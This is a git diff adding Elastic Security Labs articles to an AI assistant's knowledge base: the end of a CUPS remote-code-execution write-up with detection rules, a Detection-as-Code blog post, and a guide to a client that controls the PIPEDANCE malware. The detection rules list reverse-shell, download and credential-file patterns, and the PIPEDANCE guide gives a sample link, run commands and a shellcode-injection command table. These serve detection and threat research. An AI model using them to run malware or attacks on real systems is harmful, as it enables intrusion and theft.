+Our first attempts running the Cupshax PoC were met with a number of minor roadblocks due to the default user groups assigned to the `lp` user — namely restrictions around interactive logon, an attribute common to users that require remote access to systems. This did not, however, impact our ability to download a remote payload, compile, and execute on the impacted host system:
+
+![A remotely downloaded payload, compiled and executed on a vulnerable host](/assets/images/cups-overflow/video1.gif "A remotely downloaded payload, compiled and executed on a vulnerable host")
+
+Continued testing was performed around reverse shell invocation, successfully demonstrated below: 
+
+![A reverse shell executed on a vulnerable host](/assets/images/cups-overflow/video2.gif "A reverse shell executed on a vulnerable host")
+
+## Assessing impact
+
+* **Severity:** These vulnerabilities are given CVSS scores [controversially](https://x.com/evilsocket/status/1838220677389656127) up to 9.9, indicating a critical severity. The widespread use of CUPS and the ability to remotely exploit these vulnerabilities make this a high-risk issue.
+* **Who is affected?:** The vulnerability affects most UNIX-based systems, including major GNU/Linux distributions and other operating systems like ChromeOS and BSDs running the impacted CUPS components. Public-facing or network-exposed systems are particularly at risk. Further guidance, and notifications will likely be provided by vendors as patches become available, alongside further remediation steps. Even though CUPS usually listens on localhost, the Shodan Report [highlights](https://x.com/shodanhq/status/1839418045757845925) that over 75,000 CUPS services are exposed on the internet.
+* **Potential Damage:** Once exploited, attackers can gain control over the system to run arbitrary commands. Depending on the environment, this can lead to data exfiltration, ransomware installation, or other malicious actions. Systems connected to printers over WAN are especially at risk since attackers can exploit this without needing internal network access. 
+
+## Remediations
+
+As [highlighted](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Remediation) by @evilsocket, there are several remediation recommendations.
+
+* Disable and uninstall the `cups-browsed` service. For example, see the recommendations from [Red Hat](https://www.redhat.com/en/blog/red-hat-response-openprinting-cups-vulnerabilities) and [Ubuntu](https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available).
+* Ensure your CUPS packages are updated to the latest versions available for your distribution.
+* If updating isn’t possible, block UDP port `631` and DNS-SD traffic from potentially impacted hosts, and investigate the aforementioned recommendations to further harden the `lp` user and group configuration on the host.
+
+## Elastic protections
+
+In this section, we look into detection and hunting queries designed to uncover suspicious activity linked to the currently published vulnerabilities. By focusing on process behaviors and command execution patterns, these queries help identify potential exploitation attempts before they escalate into full-blown attacks.
+
+### cupsd or foomatic-rip shell execution
+
+The first detection rule targets processes on Linux systems that are spawned by `foomatic-rip` and immediately launch a shell. This is effective because legitimate print jobs rarely require shell execution, making this behavior a strong indicator of malicious activity. Note: A shell may not always be an adversary’s goal if arbitrary command execution is possible. 
+
+```
+process where host.os.type == "linux" and event.type == "start" and
+ event.action == "exec" and process.parent.name == "foomatic-rip" and
+ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") 
+ and not process.command_line like ("*/tmp/foomatic-*", "*-sDEVICE=ps2write*")
+```
+
+This query managed to detect all 33 PoC attempts that we performed:
+
+![](/assets/images/cups-overflow/image6.png "")
+
+https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml
+
+### Printer user (lp) shell execution
+
+This detection rule assumes that the default printer user (`lp`) handles the printing processes. By specifying this user, we can narrow the scope while broadening the parent process list to include `cupsd`. Although there's currently no indication that RCE can be exploited through `cupsd`, we cannot rule out the possibility.
+
+```
+process where host.os.type == "linux" and event.type == "start" and
+ event.action == "exec" and user.name == "lp" and
+ process.parent.name in ("cupsd", "foomatic-rip", "bash", "dash", "sh", 
+ "tcsh", "csh", "zsh", "ksh", "fish") and process.name in ("bash", "dash", 
+ "sh", "tcsh", "csh", "zsh", "ksh", "fish") and not process.command_line 
+ like ("*/tmp/foomatic-*", "*-sDEVICE=ps2write*")
+```
+
+By focusing on the username `lp`, we broadened the scope and detected, like previously, all of the 33 PoC executions:
+
+![](/assets/images/cups-overflow/image5.png "")
+
+https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml
+
+### Network connection by CUPS foomatic-rip child
+
+This rule identifies network connections initiated by child processes of `foomatic-rip`, which is a behavior that raises suspicion. Since legitimate operations typically do not involve these processes establishing outbound connections, any detected activity should be closely examined. If such communications are expected in your environment, ensure that the destination IPs are properly excluded to avoid unnecessary alerts.
+
+```
+sequence by host.id with maxspan=10s
+  [process where host.os.type == "linux" and event.type == "start" 
+   and event.action == "exec" and
+   process.parent.name == "foomatic-rip" and
+   process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] 
+   by process.entity_id
+  [network where host.os.type == "linux" and event.type == "start" and 
+   event.action == "connection_attempted"] by process.parent.entity_id
+```
+
+By capturing the parent/child relationship, we ensure the network connections originate from the potentially compromised application. 
+
+![](/assets/images/cups-overflow/image7.png "")
+
+https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
+
+### File creation by CUPS foomatic-rip child
+
+This rule detects suspicious file creation events initiated by child processes of foomatic-rip. As all current proof-of-concepts have a default testing payload of writing to a file in `/tmp/`, this rule would catch that. Additionally, it can detect scenarios where an attacker downloads a malicious payload and subsequently creates a file.
+
+```
+sequence by host.id with maxspan=10s
+  [process where host.os.type == "linux" and event.type == "start" and 
+   event.action == "exec" and process.parent.name == "foomatic-rip" and 
+   process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] by process.entity_id
+  [file where host.os.type == "linux" and event.type != "deletion" and
+   not (process.name == "gs" and file.path like "/tmp/gs_*")] by process.parent.entity_id
+```
+
+The rule excludes `/tmp/gs_*` to account for default `cupsd` behavior, but for enhanced security, you may choose to remove this exclusion, keeping in mind that it may generate more noise in alerts.
+
+![](/assets/images/cups-overflow/image1.png "")
+
+https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml
+
+### Suspicious execution from foomatic-rip or cupsd parent
+
+This rule detects suspicious command lines executed by child processes of `foomatic-rip` and `cupsd`. It focuses on identifying potentially malicious activities, including persistence mechanisms, file downloads, encoding/decoding operations, reverse shells, and shared-object loading via GTFOBins.
+
+```
+process where host.os.type == "linux" and event.type == "start" and 
+ event.action == "exec" and process.parent.name in 
+ ("foomatic-rip", "cupsd") and process.command_line like (
+  // persistence
+  "*cron*", "*/etc/rc.local*", "*/dev/tcp/*", "*/etc/init.d*", 
+  "*/etc/update-motd.d*", "*/etc/sudoers*",
+  "*/etc/profile*", "*autostart*", "*/etc/ssh*", "*/home/*/.ssh/*", 
+  "*/root/.ssh*", "*~/.ssh/*", "*udev*", "*/etc/shadow*", "*/etc/passwd*",
+    // Downloads
+  "*curl*", "*wget*",
+
+  // encoding and decoding
+  "*base64 *", "*base32 *", "*xxd *", "*openssl*",
+
+  // reverse connections
+  "*GS_ARGS=*", "*/dev/tcp*", "*/dev/udp/*", "*import*pty*spawn*", "*import*subprocess*call*", "*TCPSocket.new*",
+  "*TCPSocket.open*", "*io.popen*", "*os.execute*", "*fsockopen*", "*disown*", "*nohup*",
+
+  // SO loads
+  "*openssl*-engine*.so*", "*cdll.LoadLibrary*.so*", "*ruby*-e**Fiddle.dlopen*.so*", "*Fiddle.dlopen*.so*",
+  "*cdll.LoadLibrary*.so*",
+
+  // misc. suspicious command lines
+   "*/etc/ld.so*", "*/dev/shm/*", "*/var/tmp*", "*echo*", "*>>*", "*|*"
+)
+```
+
+By making an exception of the command lines as we did in the rule above, we can broaden the scope to also detect the `cupsd` parent, without the fear of false positives.
+
+![](/assets/images/cups-overflow/image2.png "")
+
+https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
+
+### Elastic’s Attack Discovery
+
+In addition to prebuilt content published, [Elastic’s Attack Discovery](https://www.elastic.co/guide/en/security/current/attack-discovery.html) can provide context and insights by analyzing alerts in your environment and identifying threats by leveraging Large Language Models (LLMs). In the following example, Attack Discovery provides a short summary and a timeline of the activity. The behaviors are then mapped to an attack chain to highlight impacted stages and help triage the alerts.
+
+![Elastic’s Attack Discovery summarizing findings for the CUPS Vulnerability](/assets/images/cups-overflow/image4.png "Elastic’s Attack Discovery summarizing findings for the CUPS Vulnerability")
+
+## Conclusion
+
+The recent CUPS vulnerability disclosure highlights the evolving threat landscape, underscoring the importance of securing services like printing. With a high CVSS score, this issue calls for immediate action, particularly given how easily these flaws can be exploited remotely. Although the service is installed by default on some UNIX OS (based on supply chain), manual user interaction is needed to trigger the printer job. We recommend that users remain vigilant, continue hunting, and not underestimate the risk. While the threat requires user interaction, if paired with a spear phishing document, it may coerce victims to print using the rogue printer. Or even worse, silently replacing existing printers or installing new ones as [indicated](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Impact) by @evilsocket.
+
+We expect more to be revealed as the initial disclosure was labeled part 1. Ultimately, visibility and detection capabilities remain at the forefront of defensive strategies for these systems, ensuring that attackers cannot exploit overlooked vulnerabilities. 
+
+## Key References
+
+* [https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/)
+* [https://github.com/RickdeJager/cupshax/blob/main/cupshax.py](https://github.com/RickdeJager/cupshax/blob/main/cupshax.py)
+* [https://www.cve.org/CVERecord?id=CVE-2024-47076](https://www.cve.org/CVERecord?id=CVE-2024-47076)
+* [https://www.cve.org/CVERecord?id=CVE-2024-47175](https://www.cve.org/CVERecord?id=CVE-2024-47175)
+* [https://www.cve.org/CVERecord?id=CVE-2024-47176](https://www.cve.org/CVERecord?id=CVE-2024-47176)
+* [https://www.cve.org/CVERecord?id=CVE-2024-47177](https://www.cve.org/CVERecord?id=CVE-2024-47177)
+
+*The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.*
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dac_beta_release.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dac_beta_release.md
new file mode 100644
index 0000000000000..277f68871b3fc
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dac_beta_release.md
@@ -0,0 +1,143 @@
+---
+title: "Now in beta: New Detection as Code capabilities"
+slug: "dac-beta-release"
+date: "2024-08-08"
+description: ""
+author:
+  - slug: mika-ayenson
+  - slug: eric-forte
+image: "Security Labs Images 18.jpg"
+category:
+  - slug: detection-science
+---
+
+Exciting news! Our Detections as Code (DaC) improvements to the [detection-rules](https://github.com/elastic/detection-rules) repo are now in beta. In May this year, we shared the Alpha stages of our research into [Rolling your own Detections as Code with Elastic Security](https://www.elastic.co/blog/detections-as-code-elastic-security). Elastic is working on supporting DaC in Elastic Security. While in the future DaC will be integrated within the UI, the current updates are focused on the detection rules repo on main to allow users to set up DaC quickly and get immediate value with available tests and commands integration with Elastic Security. We have a considerable amount of [documentation](https://dac-reference.readthedocs.io/en/latest/index.html) and [examples](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html), but let’s take a quick look at what this means for our users.  
+
+## Why DaC?
+
+From validation and automation to enhancing cross-vendor content, there are several reasons [previously discussed](https://www.elastic.co/blog/detections-as-code-elastic-security#why-detections-as-code) to use a DaC approach for rule management. Our team of detection engineers have been using the detection rules repo for testing and validation of our rules for some time. We now can provide the same testing and validation that we perform in a more accessible way. We aim to empower our users by adding straightforward CLI commands within our detection-rules repo, to help manage rules across the full rule lifecycle between version control systems (VCS) and Kibana. This allows users to move, unit test, and validate their rules in a single command easily using CI/CD pipelines.
+
+## Improving Process Maturity
+
+![](/assets/images/dac-beta-release/image10.png)
+
+Security organizations are facing the same bottomline, which is that we can’t rely on static out-of-the-box signatures. At its core, DaC is a methodology that applies software development practices to the creation and management of security detection rules, enabling automation, version control, testing, and collaboration in the development & deployment of security detections. Unit testing, peer review, and CI/CD enable software developers to be confident in their processes. These help catch errors and inefficiencies before they impact their customers. The same should be true in detection engineering. Fitting with this declaration here are some examples of some of the new features we are supporting. See our [DaC Reference Guide](https://dac-reference.readthedocs.io/en/latest/) for complete documentation.
+
+### Bulk Import and Export of Custom Rules
+
+Custom rules can now be moved in bulk to and from Kibana using the ```kibana import-rules``` and ```kibana export-rules``` commands. Additionally, one can move them in bulk to and from TOML format to ndjson using the ```import-rules-to-repo``` and ```export-rules-from-repo``` commands. In addition to rules, these commands support moving exceptions and exception lists using the appropriate flag. The ndjson approach's benefit is that it allows engineers to manage and share a collection of rules in a single file (exported by the CLI or from Kibana), which is helpful when access is not permitted to the other Elastic environment. When moving rules using either of these methods, the rules pass through schema validation unless otherwise specified to ensure that the rules contain the appropriate data fields. For more information on these commands, please see the [```CLI.md```](https://github.com/elastic/detection-rules/blob/DAC-feature/CLI.md) file in detection rules. 
+
+### Configurable Unit Tests, Validation, and Schemas
+
+With this new feature, we've now included the ability to configure the behavior of unit tests and schema validation using configuration files. In these files, you can now set specific tests to be bypassed, specify only specific tests to run, and likewise with schema validation against specific rules. You can run this validation and unit tests at any time by running ```make test```. Furthermore, you can now bring your schema (JSON file) to our validation process. You can also specify which schemas to use against which target versions of your Stack. For example, if you have custom schemas that only apply to rules in 8.14 while you have a different schema that should be used for 8.10, this can now be managed via a configuration file. For more information, please see our [example configuration file](https://github.com/elastic/detection-rules/blob/DAC-feature/detection_rules/etc/_config.yaml) or use our ```custom-rules setup-config``` command from the detection rules repo to generate an example for you.
+
+### Custom Version Control
+
+We now are providing the ability to manage custom rules using the same version lock logic that Elastic’s internal team uses to manage our rules for release. This is done through a version lock file that checks the hash of the rule contents and determines whether or not they have changed. Additionally, we are providing a configuration option to disable this version lock file to allow users to use an alternative means of version control such as using a git repo directly. For more information please see the [version control section](https://dac-reference.readthedocs.io/en/latest/internals_of_the_detection_rules_repo.html#rule-versioning) of our documentation. Note that you can still rely on Kibana’s versioning fields.
+
+Having these systems in place provides auditable evidence for maintaining security rules. Adopting some or all of these best practices can dramatically improve quality in maintaining and developing security rules.
+
+### Broader Adoption of Automation
+
+While quality is critical, security teams and organizations face  growing rule sets to respond to an ever-expanding threat landscape. As such, it is just as crucial to reduce the strain on security analysts by providing rapid deployment and execution. For our repo, we have a single-stop shop where you can set your configuration, focus on rule development, and let the automation handle the rest.  
+
+#### Lowering the Barrier to Entry
+
+To start, simply clone or fork our detection rules repo, run ```custom-rules setup-config``` to generate an initial config, and import your rules. From here, you now have unit tests and validation ready for use. If you are using GitLab, you can quickly create CI/CD to push the latest rules to Kibana and run these tests. Here is an [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) of what that could look like:
+
+![Example CI/CD Workflow](/assets/images/dac-beta-release/image2.png)
+
+### High Flexibility
+
+While we use GitHub CI/CD for managing our release actions, by no means are we prescribing that this is the only way to manage detection rules. Our CLI commands have no dependencies outside of their python requirements. Perhaps you have already started implementing some DaC practices, and you may be looking to take advantage of the Python libraries we provide. Whatever the case may be, we want to encourage you to try adopting DaC principles in your workflows and we would like to provide flexible tooling to accomplish these goals. 
+
+To illustrate an example, let’s say we have an organization that is already managing their own rules with a VCS and has built automation to move rules back and forth from deployment environments. However, they would like to augment these movements with testing based on telemetry which they are collecting and storing in a database. Our DaC features already provide custom unit testing classes that can run per rule. Realizing this goal may be as simple as forking the detection rules repo and writing a single unit test. The figure below shows an example of what this could look like.  
+
+![Testing and Tuning via Data Source Input Workflow](/assets/images/dac-beta-release/image3.png)
+
+This new unit test could utilize our unit test classes and rule loading to provide scaffolding to load rules from a file or Kibana instance. Next, one could create different integration tests against each rule ID to see if they pass the organization's desired results (e.g. does the rule identify the correct behaviors). If they do, the CI/CD tooling can proceed as originally planned. If they fail, one can use DaC tooling to move those rules to a “needs tuning” folder and/or upload those rules to a “Tuning” Kibana space. In this way, one could use a hybrid of our tooling and one's own tooling to keep an up to date Kibana space (or VCS controlled folder) of what rules require updates. As updates are made and issues addressed, they could also be continually synchronized across spaces, leading to a more cohesive environment.
+
+This is just one idea of how one can take advantage of our new DaC features in your environment. In practice, there are a vast number of different ways they can be utilized.
+
+## In Practice
+
+Now, let’s take a look at how we can tie these new features together into a cohesive DaC strategy. As a reminder, this is not prescriptive. Rather, this should be thought of as an optional, introductory strategy that can be built on to achieve your DaC goals.
+
+### Establishing a DaC Baseline
+
+In detection engineering, we would like collaboration to be a default rather than an exception. Detection Rules is a public repo precisely with this precept in mind. Now, it can become a basis for the community and teammates to not only collaborate with us, but also with each other. Let’s use the chart below as an example for what this could look like. 
+
+![DaC Baseline Workflow](/assets/images/dac-beta-release/image1.png)
+
+Reading from left to right, we have initial planning and prioritization and the subsequent threat research that drives the detection engineering. This process will look quite different for each user so we are not going to spend much time describing it here. However, the outcome will largely be similar, the creation of new detection rules. These could be in various forms like Sigma rules (more in a later blog), Elastic TOML rule files, or creating the rules directly in Kibana. Regardless of format, once created these rules need to be staged. This would either occur in Kibana, your VCS, or both. From a DaC perspective, the goal is to sync the rules such that the process/automation are aware of these new additions. Furthermore, this provides the opportunity for peer review of these additions — the first stage of collaboration. 
+
+![Peer Review Workflow](/assets/images/dac-beta-release/image8.png)
+
+This will likely happen in your version control system; for instance, in GitHub one could use a PR with required approvals before merging back into a main branch that acts as the authoritative source of reviewed rules. The next step is for testing and validation, this step could additionally occur before peer review and this is largely up to the desired implementation. 
+
+![Validation to Production Workflow](/assets/images/dac-beta-release/image11.png)
+
+In addition to any other internal release processes, by adhering to this workflow, we can reduce the risk of malformed rules and errant mistakes from reaching both our customers and the community. Additionally, having the evidence artifacts, passing unit tests, schema validation, etc., inspires confidence and provides control for each user to choose what risks they are willing to accept. 
+
+Once deployed and distributed, rule performance can be monitored from Kibana. Updates to these rules can be made either directly from Kibana or through the VCS. This will largely be dependent on the implementation specifics, but in either case, these can be treated very similarly to new rules and pass through the same peer review, testing, and validation processes.
+
+![Tuning Production Deployment Workflow](/assets/images/dac-beta-release/image14.png)
+
+As shown in the figure above, this can provide a unified method for handling rule updates whether from the community, customers, or from internal feedback. Since the rules ultimately exist as version-controlled files, there is a dedicated format source of truth to merge and test against. 
+
+In addition to the process quality improvements, having authoritative known states can empower additional automation. As an example, different customers may require different testing or perhaps different data sources. Instead of having to parse the rules manually, we provide a unified configuration experience where users can simply bring their own config and schemas and be confident that their specific requirements are met. All of this can be managed automatically via CI/CD. With a fully automated DaC setup, one can take advantage of this system entirely from VCS and Kibana without needing to write additional code. Let’s take a look at an example of what this could look like. 
+
+### Example
+
+For this example, we are going to be acting as an organization that has 2 Kibana spaces they want to manage via DaC. The first is a development space that rule authors will be using to write detection rules (so let’s assume there are some preexisting rules already available). There will also be some developers that are writing detection rules directly in TOML file formats and adding them to our VCS, so we will need to manage synchronization of these. Additionally, this organization wants to enforce unit testing and schema validation with the option for peer review on rules that will be deployed to a production space in the same Kibana instance. Finally, the organization wants all of this to occur in an automated manner with no requirement to either clone detection rules locally or write rules outside of a GUI. 
+
+In order to accomplish this we will need to make use of a few of the new DaC features in detection rules and write some simple CI/CD workflows. In this example we are going to be using GitHub. Additionally, you can find a video walkthrough of this example [here](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#demo-video). As a note, if you wish to follow along you will need to fork the detection rules repo and create an initial configuration using our ```custom-rules setup-config``` command. Also for general step by step instructions on how to use the DAC features, see this [quickstart guide](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#quick-start-example-detection-rules-cli-commands), which has several example commands.
+
+#### Development Space Rule Synchronization
+
+First we are going to synchronize from Kibana -> GitHub (VCS). To do this we will be using the ```kibana import-rules``` and ```kibana export-rules``` detection rules commands. Additionally, in order to keep the rule versions synchronized we will be using the locked versions file as we are wanting both our VCS and Kibana to be able to overwrite each other with the latest versions. This is not required for this setup, either Kibana or GitHub (VCS) could be used authoritatively instead of the locked versions file. But we will be using it for convenience. 
+
+The first step is for us to make a manual dispatch trigger that will pull the latest rules from Kibana upon request. In our setup this could be done automatically; however, we want to give rule authors control for when they want to move their rules to the VCS as the development space in Kibana is actively used for development and the presence of a new rule does not necessarily mean the rule is ready for VCS. The manual dispatch section could look like the following [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#option-1-manual-dispatch-pull):
+
+![](/assets/images/dac-beta-release/image15.png)
+
+With this trigger in place, we now can write 4 additional jobs that will trigger on this workflow dispatch. 
+
+ 1. Pull the rules from the desired Kibana space. 
+ 2. Update the version lock file. 
+ 3. Create a PR request for review to merge into the main branch in GitHub. 
+ 4. Set the correct target for the PR.
+
+These jobs could look like this also from the same [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#option-1-manual-dispatch-pull):
+
+![](/assets/images/dac-beta-release/image12.png)
+
+Now, once we run this workflow we should expect to see a PR open with the new rules from the Kibana Dev space. We also need to synchronize rules from GitHub (VCS) to Kibana. For this we will need to create a triggers on pull request:
+ 
+![](/assets/images/dac-beta-release/image4.png)
+ 
+Next, we just need to create a job that uses the ```kibana import-rules``` command to push the rule files from the given PR to Kibana. See the second [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) for the complete workflow file.
+
+![](/assets/images/dac-beta-release/image5.png)
+
+With these two workflows complete we now have synchronization of rules between GitHub and the Kibana Dev space. 
+
+### Production Space Deployment
+
+With the Dev space synchronized, now we need to handle the prod space. As a reminder, for this we need to enforce unit testing, schema validation, available peer review for PRs to main, and on merge to main auto push to the prod space. To accomplish this we will need two workflow files. The first will run unit tests on all pull requests and pushes to versioned branches. The second will push the latest rules merged to main to the prod space in Kibana. 
+
+The first workflow file is very simple. It has an on push and pull_request trigger and has the core job of running the ```test``` command shown below. See this [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#sub-component-3-optional-unit-testing-rules-via-ci-cd) for the full workflow.
+
+![](/assets/images/dac-beta-release/image5.png)
+
+With this ```test``` command we are performing unit tests and schema validation with the parameters specified in our config files on all of our custom rules. Now we just need the workflow to push the latest rules to the prod space. The core of this workflow is the ```kibana import-rules ```command again just using the prod space as the destination. However, there are a number of additional options provided to this workflow that are not necessary but nice to have in this example, such as options to overwrite and update exceptions/exception lists as well as rules. The core job is shown below. Please see [this example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) for the full workflow file.
+
+![](/assets/images/dac-beta-release/image7.png)
+
+And there we have it, with those 4 workflow files we have a synchronized development space with rules passing through unit testing and schema validation. We have the option for peer review through the use of pull requests, which can be made as requirements in GitHub before allowing for merges to main. On merge to main in GitHub we also have an automated push to the Kibana prod space, establishing our baseline of rules that have passed our organizations requirements and are ready for use. All of this was accomplished without writing additional Python code, just by using our new DaC features in GitHub workflows.
+
+## Conclusion
+
+Now that we’ve reached this milestone, you may be wondering what’s next? We’re planning to spend the next few cycles continuing to test edge cases and incorporating feedback from the community as part of our business-as-usual sprints. We also have a backlog of features request considerations so if you want to voice your opinion, checkout the issues titled ```[FR][DAC] Consideration:``` or open a similar new issue if it’s not already recorded. This will help us to prioritize the most important features for the community.
+    
+We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [security-rules-dac](https://elasticstack.slack.com/archives/C06TE19EP09) slack channel, and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dancing_the_night_away_with_named_pipes.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dancing_the_night_away_with_named_pipes.md
new file mode 100644
index 0000000000000..a4e3e88c994a8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dancing_the_night_away_with_named_pipes.md
@@ -0,0 +1,102 @@
+---
+title: "Dancing the night away with named pipes - PIPEDANCE client release"
+slug: "dancing-the-night-away-with-named-pipes"
+date: "2023-10-05"
+description: "In this publication, we will walk through this client application’s functionality and how to get started with the tool."
+author:
+  - slug: daniel-stepanic
+image: "photo-edited-12@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - pipedance
+  - ref1326
+---
+
+## Introduction
+
+This year at [VB2023](https://www.virusbulletin.com/conference/), a globally renowned malware conference, Daniel Stepanic of the Elastic Security Labs team presented new insights into PIPEDANCE  – a malware we [disclosed](https://twitter.com/elasticseclabs/status/1630289166008287232) earlier this year. In addition to the talk, we released a [client](https://github.com/elastic/PIPEDANCE) application that enables threat research, offering learning opportunities for both offensive and defensive teams. In this publication, we will walk through this client application’s functionality and how to get started with the tool. Our goal with this research is to help defenders improve their understanding of PIPEDANCE by emulating techniques from this malware, used by a formidable threat group. This includes different behaviors such as:
+
+ - Command and control communication through named pipes
+ - Different styles of process injection 
+ - Performing network connectivity checks
+ - System/network discovery and enumeration
+
+## Recap
+
+PIPEDANCE is a custom malware family used by a state-sponsored group to perform post-compromise activities. It's purpose-built to enable lateral movement, deploy additional implants, and perform reconnaissance functions. PIPEDANCE uses named pipes as its main channel for command and control communication. With a variety of unique features, we believe it’s a useful example to share for research purposes and can help defenders validate security tooling.
+
+For a detailed analysis of the PIPEDANCE malware, check out our [previous research](https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance).
+
+## Development
+
+To get a better understanding of different features within malware, our team at Elastic Security Labs sometimes writes custom applications and controllers to interact with the malware or malware infrastructure. This process helps cultivate knowledge of a sample’s core features, assists in understanding the control flow better, and further validates different areas such as inputs and outputs to functions and data structures. Another key benefit is to uncover functionality that was not directly observed during an intrusion but is still contained in the malware. This allows our team to collect more intelligence, build additional detections, and understand more of the adversary’s objectives behind the malware. 
+
+While we don't cover these exact scenarios in this publication, here are some things that you can do with the client (but you may think of others):
+
+ - Understand how malware abuses named pipes
+ - Verify data sources for security tooling around network activity using named pipes
+ - Build a network decoder using PCAP data from PIPEDANCE’s communication requests
+
+With the release of the client, we're hoping that the community can write additional PIPEDANCE clients in your favorite language and compare notes.
+
+![Emulated PIPEDANCE Injection functionality](/assets/images/dancing-the-night-away-with-named-pipes/image3.jpg)
+
+
+## Getting Started
+
+_**Note:** Please review the [requirements](https://github.com/elastic/PIPEDANCE/blob/main/README.md#requirements) before setting up the lab environment. For this example, we will use two different endpoints in the same local network where named pipes, inter-process communication, and SMB settings are configured properly._
+
+The first step is to download the PIPEDANCE [sample](https://malshare.com/sample.php?action=detail&hash=e5ae20ac5bc2f02a136c3cc3c0b457476d39f809f28a1c578cda994a83213887) (free [registration](https://malshare.com/register.php) required) and start the program without any arguments on one endpoint. This machine is the targeted endpoint where the adversary is interested in running additional implants and performing reconnaissance. After execution, a named pipe will be created and await an incoming connection from our client. 
+
+```
+.\e5ae20ac5bc2f02a136c3cc3c0b457476d39f809f28a1c578cda994a83213887
+```
+
+Now that PIPEDANCE is running on our targeted machine, download and compile the client files within the [repository](https://github.com/elastic/PIPEDANCE). The PIPEDANCE malware uses a hard-coded string, `u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe`, that serves as the named pipe name and RC4 key.
+
+![Hardcoded named pipe/RC4 key within PIPEDANCE](/assets/images/dancing-the-night-away-with-named-pipes/image2.png)
+
+
+Take the newly compiled client program and execute it on a separate endpoint with one argument using either the target IP address or hostname of the machine running PIPEDANCE (machine from the previous step). An example of this would be: 
+
+```
+pipedance_client.exe 192.168.47.130
+```
+
+After execution, the client will check in with the PIPEDANCE victim to retrieve the PID of the malicious process, working directory, and user running the process. A menu of commands should be listed allowing the operator to perform various post-compromise activities.
+
+![PIPEDANCE Client Menu](/assets/images/dancing-the-night-away-with-named-pipes/image1.png)
+
+
+The appendix below contains the functions and their supported arguments.
+
+## Conclusion
+
+As part of our research investigating PIPEDANCE, we are releasing a client application that interacts with the malware. This tool can be used to evaluate existing security prevention/detection technologies as well as used for threat research purposes. Please check out our [repository](https://github.com/elastic/PIPEDANCE), there is also a detection section with behavioral/YARA/hunting rules.
+
+## Appendix
+
+### Handler Commands
+
+| Command ID | Description | Arguments |
+|---|---|---|
+| 0 | Stop | PIPEDANCE client |
+| 1 | Terminate process by PID | PID (ex. 9867) |
+| 2 | Run shell command and print output | Command (ex. ipconfig) |   
+| 4 | List files in current working directory |
+| 6 | Write file to disk | Filename (full path), file content |
+| 7 | Get current working directory |
+| 8 | Change current working directory | Folder path |
+| 9 | List running processes |
+| 23 | Create random process with hijacked token from provided PID and inject shellcode (32bits) | PID (token hijack), shellcode |
+| 24 | Create random process with hijacked token from provided PID and inject shellcode (64bits) | PID (token hijack), shellcode |
+| 25 | Open process from provided PID and inject shellcode (32bits) | PID (thread hijack), shellcode |
+| 26 | Open process from provided PID and inject shellcode (64bits) | PID (thread hijack), shellcode |
+| 71 | HTTP connectivity check | Domain (ex. google.com)  
+| 72 | DNS connectivity check with provided DNS server IP  | DNS server IP
+| 73 | ICMP connectivity check | ICMP server IP |
+| 74 | TCP connectivity check | IP, port |
+| 75 | DNS connectivity check without DNS server |
+| 99 | Disconnect pipe / exit thread |
+| 100 | Terminate PIPEDANCE process / disconnect Pipe / exit thread |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/deep_dive_into_the_ttd_ecosystem.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/deep_dive_into_the_ttd_ecosystem.md
new file mode 100644
index 0000000000000..5df725cb91d32
